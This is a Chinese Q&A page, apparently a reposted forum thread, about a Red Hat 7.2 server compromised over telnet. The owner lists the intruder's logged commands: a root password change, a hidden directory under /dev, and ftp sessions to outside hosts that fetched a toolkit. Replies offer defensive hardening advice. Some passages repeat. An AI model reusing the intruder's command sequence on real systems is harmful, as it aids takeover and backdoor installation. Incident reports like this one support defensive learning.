当前位置: 技术问答>linux和unix
linux的安全
来源: 互联网 发布时间:2014-11-26
本文导语: TELNET 到我的服务器, 输入用户名/密码,顺利,su/密码,坏了,我没有输对,再来一遍,糟糕,密码改了,没有人知道我的密码呀,随后到了单位(服务器在单位),启用单用户模式,算是改了,同时看到/etc下的很...
TELNET 到我的服务器, 输入用户名/密码,顺利,su/密码,坏了,我没有输对,再来一遍,糟糕,密码改了,没有人知道我的密码呀,随后到了单位(服务器在单位),启用单用户模式,算是改了,同时看到/etc下的很多链接好象没了,都变成闪烁的了,也看到他使用了一些命令:
passwd root
clear
cd /dev/rd/a/ft
ping
clear
ping www.yahoo.com
clear
ftp ftp.mogodan.org
ftp terra2.net 6666
ftp terra2.net 666
clear
并且他上传了一个文件叫:aw.tgz
我也不知道是什么?看来安全问题不得不重视了,但是知道的太少了,另外LINUX(REDHAT 7.2)就这么不堪一击?
passwd root
clear
cd /dev/rd/a/ft
ping
clear
ping www.yahoo.com
clear
ftp ftp.mogodan.org
ftp terra2.net 6666
ftp terra2.net 666
clear
并且他上传了一个文件叫:aw.tgz
我也不知道是什么?看来安全问题不得不重视了,但是知道的太少了,另外LINUX(REDHAT 7.2)就这么不堪一击?
|
mogodan是一个木马程序
不过他没有造成什么伤害
建议对所有的账号进行审核
你不应该打开telnet服务端口,用ssl一类的加密方法吧
就算一定要打开,最好不要用常用的23端口
不过他没有造成什么伤害
建议对所有的账号进行审核
你不应该打开telnet服务端口,用ssl一类的加密方法吧
就算一定要打开,最好不要用常用的23端口
|
先找找所有suid的程序,可能已经留了后门
|
安全起见,建议重装系统,然后把不是必须的服务都去掉,密码需要设置的长一点。象telnet, ftp, email等最好都不要开,非要远程管理,那就用ssh,而且一定要下载最新版本,最好经常注意版本,打好补丁。一般来说,安全的程度就可以把一般的菜鸟防在外面了
您可能感兴趣的文章:
本站(WWW.)旨在分享和传播互联网科技相关的资讯和技术,将尽最大努力为读者提供更好的信息聚合和浏览方式。
本站(WWW.)站内文章除注明原创外,均为转载、整理或搜集自网络。欢迎任何形式的转载,转载请注明出处。
本站(WWW.)站内文章除注明原创外,均为转载、整理或搜集自网络。欢迎任何形式的转载,转载请注明出处。